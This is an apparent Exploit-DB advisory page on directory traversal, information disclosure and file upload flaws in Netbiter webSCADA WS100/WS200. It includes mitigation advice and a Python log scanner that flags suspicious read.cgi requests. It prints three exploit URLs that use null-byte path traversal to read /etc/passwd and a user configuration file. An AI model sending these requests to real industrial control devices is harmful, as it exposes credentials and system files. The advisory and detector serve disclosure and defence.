vendor: Netbiter webSCADA
by: Unknown
CVSS: 7.5 (HIGH)
Directory Traversal, Information Disclosure, Arbitrary File Upload
CWE: 22
Product Name: Netbiter webSCADA
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:intellicom:netbiter_webscada
Metasploit:
Other Scripts:
Platforms Tested:
2020

Multiple Vulnerabilities in Intellicom Netbiter webSCADA

The Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks.

Mitigation:

It is recommended to update to the latest version of Netbiter webSCADA or apply the necessary patches. Restricting access to the affected URLs and implementing proper access controls can also help mitigate these vulnerabilities.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43636/info

Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versions may also be affected.

http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
http://www.example.com/cgi-bin/read.cgi?file=/home/config/users.cfg
http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2
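
For detection, the request shapes listed above can be searched for in web-server access logs. The following Python is an added example, not part of the original advisory or the vendor's code. The log lines are constructed, and flagging every absolute path in the page/file parameters is an assumption to tune against the device's normal traffic.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from a real device); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2010:10:00:01 +0000] "GET /cgi-bin/read.cgi?page=status.html HTTP/1.1" 200 512
192.0.2.66 - - [01/Oct/2010:10:00:05 +0000] "GET /cgi-bin/read.cgi?page=../../../../etc/passwd%00 HTTP/1.1" 200 1433
192.0.2.66 - - [01/Oct/2010:10:00:09 +0000] "GET /cgi-bin/read.cgi?file=/home/config/users.cfg HTTP/1.1" 200 280
192.0.2.66 - - [01/Oct/2010:10:00:12 +0000] "GET /cgi-bin/read.cgi?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
192.0.2.10 - - [01/Oct/2010:10:00:20 +0000] "GET /index.html?file=/home/config/users.cfg HTTP/1.1" 200 99
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path segment

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return sorted reasons why a read.cgi request target looks suspicious."""
    url = urlsplit(target)
    if not url.path.endswith("/read.cgi"):
        return []
    reasons = set()
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        # Only the page and file parameters are inspected; others are ignored.
        value = fully_decode(raw) if name in ("page", "file") else ""
        if "\x00" in value:
            reasons.add("null-byte")
        if TRAVERSAL_RE.search(value):
            reasons.add("traversal")
        if value.startswith("/"):
            reasons.add("absolute-path")  # assumption: absolute paths deserve review
    return sorted(reasons)

def scan(log_text):
    """Return (client, target, reasons) for every flagged request in the log."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        reasons = classify(match.group(1)) if match else []
        if reasons:
            findings.append((line.split()[0], match.group(1), reasons))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```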